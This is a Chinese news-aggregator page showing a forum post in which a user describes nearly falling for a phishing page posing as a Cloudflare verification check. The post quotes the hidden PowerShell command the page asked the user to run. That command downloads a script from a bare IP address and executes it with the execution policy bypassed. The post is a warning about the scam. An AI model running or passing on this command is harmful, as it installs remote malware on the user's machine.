惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

博客园 - Franky
Apple Machine Learning Research
Apple Machine Learning Research
月光博客
月光博客
Vercel News
Vercel News
Recent Announcements
Recent Announcements
B
Blog RSS Feed
Y
Y Combinator Blog
M
MIT News - Artificial intelligence
MongoDB | Blog
MongoDB | Blog
酷 壳 – CoolShell
酷 壳 – CoolShell
雷峰网
雷峰网
D
Docker
Jina AI
Jina AI
IT之家
IT之家
人人都是产品经理
人人都是产品经理
L
LangChain Blog
G
Google Developers Blog
Google DeepMind News
Google DeepMind News
MyScale Blog
MyScale Blog
博客园 - 叶小钗
The GitHub Blog
The GitHub Blog
The Cloudflare Blog
A
About on SuperTechFans
Hugging Face - Blog
Hugging Face - Blog

Cloudflare

爱上 cloudflare 了 我想问问现在 Cloudflare 能不能正常登陆? cfui:基于 go 的 cloudflared web UI 一套能让免费 CloudFlare 建的站部分访问延迟变低(几乎瞬间)的方法,不是优选,夸我或者给我找 bug 为了在 CF 上实现低延迟的效果,打开页面后每半分钟发送一个请求对赛博菩萨有多大伤害?我不想遭报应 Cloudflare 的 5 秒盾/Turnstile 真的无敌吗? CapSolver 这类 api 到底靠不靠谱? https://dash.cloudflare.com 登录不进去 Cloudflare 宣布裁员逾 1100 人 这两天大家能正常登录 cf 吗? cloudflare tunnel 会阻止 openai sdk 的请求,只允许 curl 请求,如何解决 Cloudflare WARP 现在还稳吗 cloudflare worker 懂行的 开启 Cloudflare 的 DNS 代理之后, frp 就无法正常工作 cloudflare worker 能指定出口 ip 的国家吗? Cloudflare 支持使用自定义域名发邮件了 [送码]做了个 Cloudflare 监控 App - FlareKit,送点兑换码 转移到 Cloudflare Registrar 的域名疑似被盗 为什么已经把 cloudflare 上的 Cache Rules 设置为绕过缓存,还是会被限制上传大小? vibe 了一个 gotify/server 的 cloudflare worker 版本 求助: cf 上面的域名被封了 被 CF 拦截了部分页面, Error 451 错误 CF 的 ai 反爬 robots.txt 似乎部分情况下跟 Pages 机制冲突? Cloudflare 收购了 Astro 最近发现 CF WARP 在 Win & Linux 上国内能直连,安卓不行 Cloudflare Radar《2025 年度回顾》,挺有意思 白嫖 worker AI 的进 刚注册的新域名放到了 cloudflare 一周后发现访问量逐渐增加,是爬虫吗 历时 20 多天, Cloudflare 弄丢的数据找回来了 cloudflare worker 直连访问太慢了,求个替代 难道没人觉得 cloudflare 改版后,很难用吗?
碰到了伪装 Cloudflare 钓鱼验证,差点中招
liyafe1997 · 2025-11-25 · via Cloudflare

让我执行的命令

powershell -w h -c "$u='http://83.217.209.227/2UP.lim';$p=\"$env:USERPROFILE\Music\d.ps1\";(New-Object System.Net.WebClient).DownloadFile($u,$p);powershell -w h -ep bypass -f $p"

我还想着 CF 什么时候这么狠了,居然让用户执行 Shell 验证(第一反应以为是想让用户通过 Shell 往服务器上 POST 一些东西来证明不是 robot ),看到这里面的 URL 居然直接用 IP 地址而且没有 https ,还好多了个心眼。

想看看这脚本到底是啥,直接打开上面那个 URL 被卡巴斯基拦截了。

不过现在好像已经 404 了,不知道是不是会判断 UA 啥的,用浏览器打开就 404 。

关键是,这理应是个正规站(所以一开始我心理没设防),难道是被黑了?